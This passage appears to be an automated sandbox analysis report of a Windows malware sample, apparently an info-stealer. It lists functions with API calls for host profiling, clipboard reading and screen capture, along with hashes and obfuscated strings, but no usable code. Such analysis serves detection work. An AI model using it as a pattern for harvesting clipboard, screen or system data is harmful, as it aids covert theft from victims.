Function 007D7C70 Relevance: 1.7, Strings: 1, Instructions: 446COMMON

Download Yara Rule

Strings

, xrefs: 007D7DB9, 007D7DF4

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-3019521637
Opcode ID: ab57fe7678e907023f2902d0b1a607d2ddad8fa11e8e813840b9f0a647b33845
Instruction ID: 389208a514dcd2a199cbde164b400cd80890cef195e02663c4b39792b02d7384
Opcode Fuzzy Hash: ab57fe7678e907023f2902d0b1a607d2ddad8fa11e8e813840b9f0a647b33845
Instruction Fuzzy Hash: 34C17A72A083558BD718CB248881277B7F2EFD5314F58866EE8854B386F67D9C0BC392

Function 007EED60 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(007F1DA0,00C82DB8,00000018,?,?,00000018,?,?,?), ref: 007EED8E

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 007D0D10 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bde58ee83e33b51575221715f6639ca23541b944dc599e5fac59f37c20308b4
Instruction ID: f1b78534c6f402e71d3c777849969b421325a35a5d3d957db41175c58e98a736
Opcode Fuzzy Hash: 8bde58ee83e33b51575221715f6639ca23541b944dc599e5fac59f37c20308b4
Instruction Fuzzy Hash: 724122653653158BC718AEA4CCA23B776B2EF86341F08983AD582CB754F7BC4905C3A5

Function 007EA000 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5e1eec331421114206a8f7f2d4fdcb7f1a051b4ef33730bb89ccd2a0621c3b95
Instruction ID: 7678d4f4cb10ecc699bc912773262b07dd599e306ee7ec0b2e92c60460ce01e9
Opcode Fuzzy Hash: 5e1eec331421114206a8f7f2d4fdcb7f1a051b4ef33730bb89ccd2a0621c3b95
Instruction Fuzzy Hash: BD31E970706241FFD7299A26CD8163673A2EB8D364F18852CE586432A0F27D7C52E753

Function 007DECB1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 007DECE5
GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 007DED9B

Strings

QixR, xrefs: 007DEDAB
4|], xrefs: 007DED16
12!8, xrefs: 007DED0B

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID: 12!8$4|]$QixR
API String ID: 2904949787-1123279628
Opcode ID: fbb2d0f3cd277c825c6b55d3800e7e6729cf4a3c1a1034fbc7ef3adc4e46e002
Instruction ID: 97847439238939ccec2ef87d473fd680071ef9400b9a83402ca3d8fdd2dff895
Opcode Fuzzy Hash: fbb2d0f3cd277c825c6b55d3800e7e6729cf4a3c1a1034fbc7ef3adc4e46e002
Instruction Fuzzy Hash: EA218B701182C18FD7269F34C8547FA7BE1AB97354FA8486ED0CEC7292CA794805DB62

Function 007DECAD Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 007DECE5
GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 007DED9B

Strings

QixR, xrefs: 007DEDAB
4|], xrefs: 007DED16
12!8, xrefs: 007DED0B

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID: 12!8$4|]$QixR
API String ID: 2904949787-1123279628
Opcode ID: 48d8448fc41ed8c76d2d563bb126b35ec907a04d163548253a2e2d8156aa76ac
Instruction ID: 2d53f037f2e5d2a33a8e53769dc8d3197d2d231b4c1173796f2f54470cf79e1e
Opcode Fuzzy Hash: 48d8448fc41ed8c76d2d563bb126b35ec907a04d163548253a2e2d8156aa76ac
Instruction Fuzzy Hash: D311BF701182818FD765EF34D8547FB7BE1AB86310F68486ED0CEC7292CA394805DB62

Function 007DEC39 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 007DED9B

Strings

QixR, xrefs: 007DEDAB
4|], xrefs: 007DED16
12!8, xrefs: 007DED0B

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID: ComputerName
String ID: 12!8$4|]$QixR
API String ID: 3545744682-1123279628
Opcode ID: b073953076fc9bd2f305f2cf0b5b2e1585081700d9dd0fdb03a1da27ef207f26
Instruction ID: f83d031e8b57bd750d39fc4b91e4175524c41aa4c24a3318e107fc2a05247bf7
Opcode Fuzzy Hash: b073953076fc9bd2f305f2cf0b5b2e1585081700d9dd0fdb03a1da27ef207f26
Instruction Fuzzy Hash: CF11A0701182818FD765EF34C8607FB7BE5AB86314FA8486ED0CEC7292DA795805DB62

Function 007EEFF7 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 007EEFF7
GetForegroundWindow.USER32 ref: 007EF000

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 82162f4c80817987cd0a49c8f956e8157b47cc96523dbfb8ab5d9593001e6acb
Instruction ID: 1ae5ff6e200ebb9f566ca0d716b1e7f5c960a4b2e8ee96ea8fdca1a3ac813856
Opcode Fuzzy Hash: 82162f4c80817987cd0a49c8f956e8157b47cc96523dbfb8ab5d9593001e6acb
Instruction Fuzzy Hash: BAC00234575141CBC3048B35F8995367BB1B74A206701A818A60BD2260DF289415CA2C

Function 007DEDC1 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 007DEE7B

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 153e1e3e6c9318e5b6af3a5b80bb16ad601de168d965267637684b43b30d6b50
Instruction ID: cbb2cfd53bfe6b7cd82009a326de1dfc1b6ab90a226d0ec96db2361b6dd5f9c8
Opcode Fuzzy Hash: 153e1e3e6c9318e5b6af3a5b80bb16ad601de168d965267637684b43b30d6b50
Instruction Fuzzy Hash: A8116D2410D3C18ADB769B3594687FBBBE4AB5B744F18499ED1D9CB292CA388009CB12

Function 007DEDBF Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 007DEE7B

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 4b802b73c89acf26a83eebf3a5a053a77d8d1aae7322ded5748807908250ff63
Instruction ID: 2d0bcb73415c335e93ff05214df164bf51e6952453669bd0734245af304ddd01
Opcode Fuzzy Hash: 4b802b73c89acf26a83eebf3a5a053a77d8d1aae7322ded5748807908250ff63
Instruction Fuzzy Hash: 01019E7410D3C18BDB759B3598687FBBBE4EB8A714F24496ED1DACB291CB3880048B12

Function 007E91E4 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 007E9213

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: 75c20351abf4e94bd57e3eb474329b5bbed27a09e75060d6029554f691c93439
Instruction ID: a5ce51d5a500c657bd81fa2c4032e04c0dac84d6a3d2a5f8fb4878353bd51034
Opcode Fuzzy Hash: 75c20351abf4e94bd57e3eb474329b5bbed27a09e75060d6029554f691c93439
Instruction Fuzzy Hash: F4010835404AC28FCB158F3889582ADBBB16F1A720F2483CCD8A5533EAC7256906CB91

Function 007E3DA5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 007E3DEE

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 730b1744f29e777acdd8faddeec6029d1cd3c6b7398f243b3891f47558876f60
Instruction ID: 85989198c43f0e65ab2048764c97e1b70f3522d8ca936df522c2d3e6beb2a267
Opcode Fuzzy Hash: 730b1744f29e777acdd8faddeec6029d1cd3c6b7398f243b3891f47558876f60
Instruction Fuzzy Hash: 00F0B7702097429FD315DF64C5A475BBBE0FF49304F01891CE1968B390DBB9A948CF96

Function 007E2BFC Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 007E2C45

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: f71886a2fd840702ae82d4e30e2202cac11973160da50776fcac926888e0d2e1
Instruction ID: 6d1b9c3de44954e0847d09a43fa23095d1989ef57a5e4002fe0a435de8e5f72d
Opcode Fuzzy Hash: f71886a2fd840702ae82d4e30e2202cac11973160da50776fcac926888e0d2e1
Instruction Fuzzy Hash: 40F014B41097018FE315DF29D1A4B1ABBF4FB85308F10994CE5998B3A0C7B6A949CF82

Function 007BCAC3 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 007BCAD5

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 3a9eebc61db762adee5cae3eafc5e97b7324ef0577638861aecf38fc7845416e
Instruction ID: 25eb9b201d6f44a45aaf336fae32dac51dc6755a1583c0b2ddabe0001b73e3f8
Opcode Fuzzy Hash: 3a9eebc61db762adee5cae3eafc5e97b7324ef0577638861aecf38fc7845416e
Instruction Fuzzy Hash: C8D092303D43417BE1644608EC17F6023105701F25F715208B323FE2E4CA94A100C62C

Function 007BCA90 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 007BCAA3

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 4f2eacb5f1c4b8abe2e4a040e82311482dcb43e7f51f6ce409e61c9295b667e4
Instruction ID: 47ef5c86eb315fbc8f4f9dda198c14fe1b34cabda7073d549a863403140e0e7a
Opcode Fuzzy Hash: 4f2eacb5f1c4b8abe2e4a040e82311482dcb43e7f51f6ce409e61c9295b667e4
Instruction Fuzzy Hash: D1D097302804002BC210A75CEC0BF32375CC302310F444228F362C61C1C8182800D2BD

Function 007ED2D2 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 007ED2ED

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: e6bfa02eb389774c02d589cc8c634bb31be316e62beeb2084f19afcd1e0b50ed
Instruction ID: e033301b1a9a0fe2507079a833fd5ca6d0147297d64d499c4821f4254666fa20
Opcode Fuzzy Hash: e6bfa02eb389774c02d589cc8c634bb31be316e62beeb2084f19afcd1e0b50ed
Instruction Fuzzy Hash: 40C08C3140512AEFCA903F18BC1ABE63B10AF44330F070890F600581B6C7ADDCA1C9D4

Function 007ED2A0 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,8180A786,5A5700FE,007B88FF,8180A786), ref: 007ED2B0

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 086b47625678bb6d899ff83de1827116c8a80382cd45909d59bb7d660125b0a1
Instruction ID: c2be2201dbc54ecd74f6674191499168fbae730d8a1076482df9367206d39f54
Opcode Fuzzy Hash: 086b47625678bb6d899ff83de1827116c8a80382cd45909d59bb7d660125b0a1
Instruction Fuzzy Hash: C1C09B31445135EBC5506B14FC0DFD67F54EF45360F024455B10467173C7B16C51D6D4

Non-executed Functions

Function 007E5630 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 131clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 007E5644
GetClipboardData.USER32 ref: 007E5665
GlobalLock.KERNEL32 ref: 007E567E
CloseClipboard.USER32 ref: 007E57E6

Strings

B, xrefs: 007E5743
@, xrefs: 007E5739
@, xrefs: 007E5720
E, xrefs: 007E5716
O, xrefs: 007E570C
C, xrefs: 007E572A
T, xrefs: 007E571B
M, xrefs: 007E5711
E, xrefs: 007E573E
Q, xrefs: 007E5725
N, xrefs: 007E572F

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID: Clipboard$CloseDataGlobalLockOpen
String ID: @$@$B$C$E$E$M$N$O$Q$T
API String ID: 1494355150-983516869
Opcode ID: f3181d36779d89cf07a3250f49a5efe28bb5c233b0090013df581dc0234ce3ac
Instruction ID: b48573c46e69421d769df8da022a46e3813aa5d7405900c8ce4387cd2e9c143b
Opcode Fuzzy Hash: f3181d36779d89cf07a3250f49a5efe28bb5c233b0090013df581dc0234ce3ac
Instruction Fuzzy Hash: 0F41B27050D785CFD300AFB9958836FBFD0AB85314F05492DE5C987282E6BD8988C757

Function 007D5990 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 286COMMON

Download Yara Rule

Strings

IK, xrefs: 007D59DF
pq, xrefs: 007D5A21
8U$W, xrefs: 007D5A35
4A0C, xrefs: 007D59F5
y{, xrefs: 007D5A0B
z`gf, xrefs: 007D59BC
5M=O, xrefs: 007D59EA
-E*G, xrefs: 007D5A00

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID: IK$y{$-E*G$4A0C$5M=O$8U$W$pq$z`gf
API String ID: 0-2020977481
Opcode ID: 7bc7d3d50891c06ecf1d95525ea7a5f7bf6994e4b01d79f0b99ca1d27cbdc74d
Instruction ID: 28b25a91726ddd4fd1175a4bc017d6ebf8bc1ec326e3c52b7629aa525a7e7849
Opcode Fuzzy Hash: 7bc7d3d50891c06ecf1d95525ea7a5f7bf6994e4b01d79f0b99ca1d27cbdc74d
Instruction Fuzzy Hash: AFA100B19082549BEB18CFA8EC417EFBBF0FB85310F10496DE99197391D7799401CB95

Function 007E5B65 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 118COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 007E5BB2
GetSystemMetrics.USER32 ref: 007E5BC1
DeleteObject.GDI32 ref: 007E5BFF
SelectObject.GDI32 ref: 007E5C4C
SelectObject.GDI32 ref: 007E5CA3
DeleteObject.GDI32 ref: 007E5CD1

Part of subcall function 007E6330: GetObjectW.GDI32 ref: 007E63DD

Strings

, xrefs: 007E5C7A

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID: Object$DeleteMetricsSelectSystem
String ID:
API String ID: 3911056724-3916222277
Opcode ID: 82381981286f65648ad4cabbf5bb7843f175d1754e74475c1884b6141c3116be
Instruction ID: e8f4bc89f26eec516dd05e75e83ed9595e0132f5838229964cc194edc83f6d4a
Opcode Fuzzy Hash: 82381981286f65648ad4cabbf5bb7843f175d1754e74475c1884b6141c3116be
Instruction Fuzzy Hash: D25190B09152149FDB00EFACD98566EBFF0BB48304F01852EE888E7350D774A949CF96

Function 007C56E3 Relevance: 9.7, Strings: 7, Instructions: 932COMMON

Download Yara Rule

Strings

DJ, xrefs: 007C57CA
hx, xrefs: 007C5864
8w, xrefs: 007C5854
l, xrefs: 007C6079
D, xrefs: 007C5A2B
ty, xrefs: 007C585C
}r, xrefs: 007C584C

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID: 8w$D$hx$l$ty$}r$DJ
API String ID: 0-740754796
Opcode ID: ae3622f1525d91d75699efd0545edcc11604baef76977fe7145023bbe4768eef
Instruction ID: 67e8ca992bdd41b8eb9ef50c0c74635cb5215a8d934513f8844d5931d806af0a
Opcode Fuzzy Hash: ae3622f1525d91d75699efd0545edcc11604baef76977fe7145023bbe4768eef
Instruction Fuzzy Hash: 215213B0108781DFD7258F28C890B7B7BE1FF86354F548A5CE0CA8B2A1D739A945CB56

